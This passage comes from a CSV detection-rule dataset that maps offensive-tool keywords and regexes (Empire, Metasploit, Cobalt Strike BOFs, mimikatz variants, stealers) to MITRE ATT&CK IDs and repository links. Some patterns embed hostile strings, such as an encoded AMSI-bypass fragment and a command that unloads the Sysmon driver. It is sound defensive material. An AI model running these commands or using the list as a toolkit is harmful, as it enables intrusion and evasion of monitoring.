WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","0","N/A","N/A","8","791","142","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" "*Find-WMILocalAdminAccess*",".{0,1000}Find\-WMILocalAdminAccess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Finish moonwalk and clear your traces*",".{0,1000}Finish\smoonwalk\sand\sclear\syour\straces.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","N/A","10","10","1302","125","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z" "*fir3d0g/mimidogz*",".{0,1000}fir3d0g\/mimidogz.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*FireBuster.ps1*",".{0,1000}FireBuster\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*fireeye*commando*",".{0,1000}fireeye.{0,1000}commando.{0,1000}","offensive_tool_keyword","commando-vm","CommandoVM - a fully customizable Windows-based security distribution for penetration testing and red teaming.","T1059 - T1053 - T1055 - T1070","TA0002 - TA0004 - TA0008","N/A","N/A","Exploitation OS","https://github.com/mandiant/commando-vm","1","1","N/A","N/A","10","6697","1259","2024-04-15T18:31:30Z","2019-03-26T22:36:32Z" "*FireFart*dirtycow*",".{0,1000}FireFart.{0,1000}dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tools","https://github.com/FireFart/dirtycow","1","1","N/A","N/A","9","817","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z" "*firefox/FakeUpdate_files/*",".{0,1000}firefox\/FakeUpdate_files\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*firefox_decrypt.py*",".{0,1000}firefox_decrypt\.py.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*firefox_decrypt-main*",".{0,1000}firefox_decrypt\-main.{0,1000}","offensive_tool_keyword","firefox_decrypt","Firefox Decrypt is a tool to extract passwords from Mozilla","T1555.003 - T1112 - 
T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/unode/firefox_decrypt","1","1","N/A","10","10","1811","293","2024-04-07T20:04:37Z","2014-01-17T13:25:02Z" "*firefox_extension_bindshell*",".{0,1000}firefox_extension_bindshell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*firefox_extension_reverse_shell*",".{0,1000}firefox_extension_reverse_shell.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*firefox_privilege_escalation.rb*",".{0,1000}firefox_privilege_escalation\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*firefox_privilege_escalation_spec.rb*",".{0,1000}firefox_privilege_escalation_spec\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*firefox_smil_uaf*",".{0,1000}firefox_smil_uaf.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*FireListener.ps1*",".{0,1000}FireListener\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Firesheep/*",".{0,1000}Firesheep\/.{0,1000}","offensive_tool_keyword","firesheep","Free program for HTTP session hijacking attacks.","T1550 - T1555 - T1559 - T1565","TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://codebutler.github.io/firesheep/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Firewall_Walker_BOF*",".{0,1000}Firewall_Walker_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF to interact with COM objects associated with the Windows software firewall.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - 
T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Firewall_Walker_BOF","1","1","N/A","10","10","99","14","2021-10-10T03:28:27Z","2021-10-09T05:17:10Z" "*fishing_with_hollowing*",".{0,1000}fishing_with_hollowing.{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/YDHCUI/csload.net","1","1","N/A","10","10","122","14","2021-05-21T02:36:03Z","2021-05-20T08:24:16Z" "*FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==*",".{0,1000}FJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw\=\=.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*fkasler/cuddlephish*",".{0,1000}fkasler\/cuddlephish.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","10","4","311","25","2024-03-28T14:17:28Z","2023-08-02T14:30:41Z" "*Flangvik/NetLoader*",".{0,1000}Flangvik\/NetLoader.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Flangvik/SharpCollection*",".{0,1000}Flangvik\/SharpCollection.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Flangvik/SharpExfiltrate*",".{0,1000}Flangvik\/SharpExfiltrate.{0,1000}","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","1","N/A","10","2","123","35","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*Flangvik/TeamFiltration*",".{0,1000}Flangvik\/TeamFiltration.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*flashupdate.ps1*",".{0,1000}flashupdate\.ps1.{0,1000}","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" 
"*flipt-io/reverst*",".{0,1000}flipt\-io\/reverst.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","1","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "*floesen/EventLogCrasher*",".{0,1000}floesen\/EventLogCrasher.{0,1000}","offensive_tool_keyword","EventLogCrasher","crash the Windows Event Log service of any other Windows 10/Windows Server 2022 machine on the same domain","T1562.002 - T1489","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/floesen/EventLogCrasher","1","1","N/A","10","2","164","28","2024-01-23T14:04:23Z","2024-01-23T09:27:27Z" "*floesen/KExecDD*",".{0,1000}floesen\/KExecDD.{0,1000}","offensive_tool_keyword","KExecDD","Admin to Kernel code execution using the KSecDD driver","T1068 - T1055.011","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/floesen/KExecDD","1","1","N/A","8","2","172","27","2024-04-19T09:58:14Z","2024-04-19T08:54:49Z" "*florylsk/NtRemoteLoad*",".{0,1000}florylsk\/NtRemoteLoad.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","1","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*fltMC* unload SysmonDrv*",".{0,1000}fltMC.{0,1000}\sunload\sSysmonDrv.{0,1000}","offensive_tool_keyword","fltMC","Unload Sysmon driver. allow the attacker to bypass sysmon detections (most of it. 
network monitoring will still be effective)","T1562.006 - T1562.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/System/unload_sysmon_driver_with_fltmc.ps1","1","0","N/A","N/A","2","122","13","2024-04-24T09:54:32Z","2022-12-05T12:40:02Z" "*FluxionNetwork*",".{0,1000}FluxionNetwork.{0,1000}","offensive_tool_keyword","FluxionNetwork","Fluxion is a security auditing and social-engineering research tool. It is a remake of linset by vk496 with (hopefully) fewer bugs and more functionality. The script attempts to retrieve the WPA/WPA2 key from a target access point by means of a social engineering (phishing) attack. It's compatible with the latest release of Kali (rolling). Fluxion's attacks' setup is mostly manual. but experimental auto-mode handles some of the attacks' setup parameters. Read the FAQ before requesting issues","T1559 - T1189 - T1059 - T1566 - T1056","TA0001 - TA0002 - TA0009","N/A","N/A","Phishing","https://github.com/FluxionNetwork/fluxion","1","1","N/A","N/A","10","4697","1380","2023-11-03T23:16:30Z","2017-04-29T10:22:27Z" "*fnjhmkhhmkbjkkabndcnnogagogbneec*",".{0,1000}fnjhmkhhmkbjkkabndcnnogagogbneec.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fnnegphlobjdpkhecapkijjdkgcjhkib*",".{0,1000}fnnegphlobjdpkhecapkijjdkgcjhkib.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*fodhelperbypass*",".{0,1000}fodhelperbypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*fodhelperUACBypass*",".{0,1000}fodhelperUACBypass.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Follina.Ninja*",".{0,1000}Follina\.Ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - 
TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*follina.py*muban.docx*",".{0,1000}follina\.py.{0,1000}muban\.docx.{0,1000}","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed","1","1","N/A","N/A","4","392","57","2023-04-13T16:46:26Z","2022-06-02T12:33:18Z" "*Follina/follina.html*",".{0,1000}Follina\/follina\.html.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*Follina/Follinadoc*",".{0,1000}Follina\/Follinadoc.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*for /f %%i in (C:\Windows\IME\ok.txt)*",".{0,1000}for\s\/f\s\%\%i\sin\s\(C\:\\Windows\\IME\\ok\.txt\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - 
T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*for /r c:\windows\system32\ %i in (*sht*.exe)*",".{0,1000}for\s\/r\sc\:\\windows\\system32\\\s\%i\sin\s\(.{0,1000}sht.{0,1000}\.exe\).{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*For fun and (no) profit : lets hook rtlcomparememory in lsass.exe*",".{0,1000}For\sfun\sand\s\(no\)\sprofit\s\:\slets\shook\srtlcomparememory\sin\slsass\.exe.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 
- T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*-force-forwardableet-ADComputer*",".{0,1000}\-force\-forwardableet\-ADComputer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*foreign_access.cna*",".{0,1000}foreign_access\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/alfarom256/BOF-ForeignLsass","1","1","N/A","10","10","98","25","2021-08-23T16:57:08Z","2021-08-21T00:19:29Z" "*foreign_lsass * *",".{0,1000}foreign_lsass\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS Dumping With Foreign Handles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 